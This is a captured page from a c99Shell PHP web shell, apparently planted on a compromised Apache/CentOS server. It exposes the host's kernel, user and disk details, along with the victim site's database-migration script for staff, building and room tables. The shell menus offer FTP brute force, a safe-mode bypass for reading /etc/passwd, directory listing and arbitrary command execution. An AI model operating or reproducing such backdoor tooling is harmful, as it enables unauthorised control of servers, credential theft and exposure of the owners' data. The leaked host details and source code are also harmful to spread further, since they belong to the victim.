110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/xmigratex/ drwxr-xr-x Free 52.59 GB of 127.8 GB (41.15%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php 
$sm=array( 
array('old' =>array('name'=>'Officer', 'fld'=>array('officerId','officerNameEng','officerSurnameEng','officerEmail','ofPicturePath')),
'new' =>array('name'=>'PersonT', 'fld'=>array('personId','fName2','lName2','emailAddr','pic')),
'ref' =>array('fld'=>array('-','-','-','-','-')),
'def' =>array('fld'=>array('-','-','-','-','picpath/ofPicturePath/ ')),
'minus' =>array(),
'plus' =>array(),
'sql' =>'?',
'qry' =>" SELECT officerId,officerNameEng,officerSurnameEng,officerEmail,TRIM(REPLACE(ofPicturePath,'../pictureT/',''))
FROM $dbreg.`Officer` 
WHERE ofSitId = 1 AND officerCode NOT IN 
(SELECT personCode FROM $dbppc.`Person` ) 
ORDER BY officerId"),
array('old' =>array('name'=>'Officer', 'fld'=>array('officerId','officerCode','prefixId','officerName','officerSurname','officerStatus')),
'new' =>array('name'=>'Person', 'fld'=>array('personId','personCode','prefixId','fName','lName','fStatus')),
'ref' =>array('fld'=>array('-','-','-','-','-','-')),
'def' =>array('fld'=>array('-','-','-','-','-','-')),
'minus' =>array(),
'plus' =>array(),
'sql' =>'?',
'qry' =>" SELECT officerId,officerCode,prefixId,officerName,officerSurname,officerStatus 
FROM $dbreg.`Officer` WHERE ofSitId = 1 AND officerCode NOT IN 
(SELECT personCode FROM $dbppc.`Person` ) ORDER BY officerId"),

array('old' =>array('name'=>'Officer', 'fld'=>array('-','contactAddress','contactPhone','prefixId','contactPhone','officerName','officerSurname')),
'new' =>array('name'=>'Personout', 'fld'=>array('outtypeId','address','phone','prefixId','workPhone','fName','lName')),
'ref' =>array('fld'=>array('-','-','-','-','-','-','-')),
'def' =>array('fld'=>array('-','-','-','-','-','-','-')),
'minus' =>array(),
'plus' =>array('0'),
'sql' =>'?',
'qry' => " SELECT 
'3', contactAddress, contactPhone, prefixId, contactPhone, officerName, officerSurname
FROM $dbreg.`Officer` WHERE ofSitId = 2 "),

array('old' =>array('name'=>'Building', 'fld'=>array('-','-','-','-','-','-','-','-','buildingName')),
'new' =>array('name'=>'spc_Place', 'fld'=>array('plRmNo','plFloor','plBuilding','plRtId','plIsRoom','plIsDom','plNumFloor','plCapacity','hwName')),
'ref' =>array('fld'=>array('-','-','-','-','-','-','-','-')),
'def' =>array('fld'=>array('default/ /','default/0/','default/NULL/','default/NULL/','default/N/','default/1/','default/0/','-')),
'minus' =>array(),
'plus' =>array('0','1','2','3','4','5','6','7'),
'sql' => '?',
'qry' => " SELECT '','0',NULL,NULL,'N','N','1','0',buildingName 
FROM $dbreg.`Building` WHERE 1  "),
/* OLD CODE: 'qry' => " SELECT '','0',NULL,NULL,'N','N','1','0',buildingName 
FROM $dbreg.`Building` WHERE buildingName NOT IN 
(SELECT hwName FROM $dbppc.`spc_Place`) " */
array('old' =>array('name'=>'Room', 'fld'=>array('roomNo','-','buildingId','-','-','-','-','capacity','roomNo')),
'new' =>array('name'=>'spc_Place', 'fld'=>array('plRmNo','plFloor','plBuilding','plRtId','plIsRoom','plIsDom','plNumFloor','plCapacity','hwName')),
'ref' =>array('fld'=>array('-','-','-','-','-','-','-','-')),
'def' =>array('fld'=>array('-','default/1/','-','default/1/','default/Y/','default/0/','-','-')),
'minus' =>array(),
'plus' =>array('1','3','4','5'),
'sql' => '?',
'qry' => " SELECT roomNo,'1',buildingId,'1','Y','N','1',capacity,roomNo 
FROM $dbreg.`Room` WHERE 1 "),
/* OLD CODE: 'qry' => " SELECT roomNo,'1',buildingId,'1','Y','N','1',capacity,roomNo 
FROM $dbreg.`Room` WHERE roomNo NOT IN 
(SELECT hwName FROM $dbppc.`spc_Place`) " */

array('old' =>array('name'=>'Dom', 'fld'=>array('-','-','-','-','-','-','-','-','domName')),
'new' =>array('name'=>'spc_Place', 'fld'=>array('plRmNo','plFloor','plBuilding','plRtId','plIsRoom','plIsDom','plNumFloor','plCapacity','hwName')),
'ref' =>array('fld'=>array('-','-','-','-','-','-','-','-')),
'def' =>array('fld'=>array('default/ /','default/1/','default/NULL/','default/NULL/','default/N/','default/1/','default/0/','-')),
'minus' =>array(),
'plus' =>array('0','1','2','3','4','5','6','7'),
'sql' => '?',
'qry' => " SELECT '','1',NULL,NULL,'N','Y','1','0',domName 
FROM $dbreg.`Dom` WHERE 1 ")
); 
/* OLD CODE: 'qry' => " SELECT '','1','NULL','28','N','Y','1','0',domName 
FROM $dbreg.`Dom` WHERE domName NOT IN 
(SELECT hwName FROM $dbppc.`spc_Place`) "*/
/*

*/
?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: